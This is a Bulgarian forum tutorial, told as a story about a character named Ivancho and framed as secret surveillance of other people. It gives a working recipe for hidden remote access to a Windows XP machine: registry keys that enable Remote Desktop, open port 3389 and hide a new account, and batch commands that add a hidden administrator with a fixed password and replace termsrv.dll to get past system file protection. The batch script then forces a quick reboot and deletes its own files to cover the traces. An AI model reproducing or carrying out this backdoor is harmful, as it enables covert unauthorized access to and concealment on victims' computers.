Преди да започнете да четете пуснете си
тази песеничка
До тази тема мойте герой използваха методи за тайно следене но тези методи бяха "видими" тук ще се разкрие нещо по различно
Иванчо ровил из любимия си форум и намерил една доста интересна тема ... но за жалост там не се разкривало как става въпросното логване във оделна сесия, той започнал търсенето си... така какво знаем, знаем че трябва да се замени един .dll файл....(ех че много знаем ) след малко търсене и размяна на думички във гугал стигнал до Multiuser Remote Desktop но никъде не се разкривало как може да стане по автоматизиран начин без намесата на някого... но той не се спрял до тук... той знаел че всяка намеса... настройка се запазва някъде ако тези изменения се направят на друга машина то тази настройка ще се активират и при него... въпрос: къде се запазват промените отговор: във регистрите разбирасе... Иванчо започнал следенето на регистрите (това ви го оставям сами да си отговорите как става)... намерил промените...
1. 1.JPG
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
---------------------------------------------------------------------------------------------------------------------
2.....
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core]
"EnableConcurrentSessions"=dword:00000001
----------------------------------------------------------------------------------------------------------------------
3. START - RUN - gpedit.msc ... 2.JPG
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{35B2C1E5-9726-4433-B23F-90BE782FA4C0}Machine\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services]
"MaxInstanceCount"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0]
"Options"=dword:00000000
"Version"=dword:00010001
"DSPath"="LocalGPO"
"FileSysPath"="C:\\WINDOWS\\System32\\GroupPolicy\\Machine"
"DisplayName"="Local Group Policy"
"Extensions"="[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{0F6B957D-509E-11D1-A7CC-0000F87571E3}]"
"Link"="Local"
"GPOName"="Local Group Policy"
"GPOLink"=dword:00000001
"lParam"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}]
"StartTimeLo"=dword:b150aaa0
"StartTimeHi"=dword:01c89cc6
"EndTimeLo"=dword:b29008d0
"EndTimeHi"=dword:01c89cc6
"Status"=dword:00000000
"LoggingStatus"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\GPO-List\0]
"Version"=dword:00010001
"WQLFilterPass"=dword:00000001
"AccessDenied"=dword:00000000
"GPO-Disabled"=dword:00000000
"Options"=dword:00000000
"GPOID"="Local Group Policy"
"SOM"="Local"
"DisplayName"="Local Group Policy"
"WQL-Id"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}]
"Status"=dword:00000000
"RsopStatus"=dword:00000000
"LastPolicyTime"=dword:00e2f8d5
"PrevSlowLink"=dword:00000000
"PrevRsopLogging"=dword:00000001
"ForceRefreshFG"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services]
"MaxInstanceCount"=dword:00000002
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch]
"Epoch"=dword:00000054
--------------------------------------------------------------------------------------------------------------------------------
4.Скрил акаунта за който ще се спомене малко по долу
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"admin001"=dword:00000000
---------------------------------------------------------------------------------------------------------------------------------
До тук готово само трябва да се сейфа със разширение .reg (Key.reg) и промените ще са на яве но трябва да има нещо което да командва всичко и да не забравим за подмяната на termsrv.dll
Иванчо отворил notepad и започнал
1. Създаване на нов User със всички права за администратор...
net user admin001 123456 /add /expires:never /times:all
net localgroup "administrators" admin001 /add
User: admin001
Pass: 123456
------------------------------------------------------------------------------------------------
2. Слагане ключовете във регистара
regedit /s key.reg
-----------------------------------------------------------------------------------------------
3. Подмяна на .dll със неговия който ще се взима от C:\WINDOWS\system32\dllxx
copy %SystemRoot%\system32\dllxx\termsrv.dll %SystemRoot%\system32\DLLCache\ <- заместване на дела от DLLCache
ren %SystemRoot%\system32\termsrv.dll termsrv.old <- смяна на разширението
copy %SystemRoot%\system32\dllxx\termsrv.dll %SystemRoot%\system32 <- заместване
(тук ще разкрия една мъничка част която не исках да казвам за да не се породят нови "псевдо хакери"... но както и да е)
Настройката във Group Policy за лимита на свързаните компютри няма да е активно ако не се копне един файл а имено Registry.rar (деархивирайте във създадената папка dllxx )
след което се добавя още един ред във нашия бат...
copy %SystemRoot%\system32\dllxx\Registry.pol %SystemRoot%\system32\GroupPolicy\Machine
и много бързо рестартваме за да не се усети защитната функция на Windows...
shutdown -r -t 3
4. Между 3-те секунди до рестарт затриваме следите си...
rd /s /q %SystemRoot%\system32\dllxx
и тук остава зглобката...
част 2
част 1